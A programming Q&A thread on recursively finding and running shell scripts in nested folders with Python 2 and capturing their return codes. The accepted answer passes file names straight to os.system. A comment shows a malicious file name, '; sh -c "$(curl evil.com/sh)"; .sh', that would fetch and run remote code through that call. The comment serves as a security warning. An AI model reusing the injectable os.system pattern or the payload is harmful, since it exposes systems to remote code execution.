# Python, step through folders (to run scripts)

Tags: python, python-2.6

Since Im unfamiliar with Python I thought i'd come here.

Anyways I have several Folders (lets say 20 folders)
Within each folder is more folders (lets say 5 per)
and within EACH one of these folders is another folder, and within THAT is a script I need to run.

The script is ran the same way 'ie':sh script.sh

Basically I need to run this script for each of these folders, problem is I have no clue how to step into each folder (that has the script) which is 4 levels down from the original folder.

So there are a total of like 120 scripts that need to be ran the same way (this script also returns a number for instance (1 for success, 0 for failure) that I need to record (shouldn't be too hard to figure out)

What would be the best way to go about this? The Checking results I think I can figure out, but stepping through all these subfolders Im honestly not well versed in python to know about.

> ```
> Just so everyones clear the folder structure is like this:
> Top Level (20 or so folders)
>  -->1 Below (5 or so Folders)
>  ----->1 below one of these 5 folders (only 1 folder is contained)
>  --------->1 below that one folder (here is where the script resides)
> ```

Don't ask me why the folders are structured this way.....lol. This would be done in python 2 preferably.

Comment: Do you need a solution in Python?  Why not simply `for script in */*/*/*.sh; do sh $script; done` in bash?

Comment: Hmmm never thought about that lol. but the problem would be getting the return data :/

Answer (score 1, accepted):

A bit overkill, but it should work:

```
import os

root = '/foo/'

for directory, subdirectories, files in os.walk(root):
  for file in files:
     if os.path.splitext(file)[-1].lower() == '.sh':
       os.system('sh ' + os.path.join(directory, file))
```

Comment: Meet my favorite file, `; sh -c "$(curl evil.com/sh)"; .sh`

Comment: Shouldn't `root` and `root_dir` be the same?

Comment: Would this do it for ALL the .sh files (remember there are like 120 of them)? and im assuming under os.system I would do my run command?

Comment: Yes, it does it for all `sh` files.

Comment: Awesome thanks! Where would I put the actual filename though (they are all called the same thing, the shell script I mean.)

Answer (score 2):

```
import glob,subprocess
for script in glob.glob('*/*/*/*.sh'):
   s = subprocess.Popen([script], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
   stdoutdata,stderrdata = s.communicate()
   returncode = s.returncode
   # Do something with stdoutdata, returncode etc. here
```

Comment: could I do something like result=subprocess.Popen([script]).communicate() to get the output of what the script outputs?

Comment: @Sauron Precisely. Updated the answer to reflect that.